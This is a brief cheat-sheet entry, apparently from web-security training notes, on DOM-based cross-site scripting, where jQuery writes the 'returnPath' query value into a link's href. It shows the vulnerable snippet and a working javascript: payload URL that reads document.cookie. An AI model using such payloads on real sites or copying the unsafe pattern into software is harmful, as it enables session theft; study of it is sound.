DOM XSS: jQuery Anchor href Attribute Sink Using location.search Source¶
Vulnerable:
$(function() {
$('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath'));
});
Payload: /feedback?returnPath=javascript:alert(document.cookie)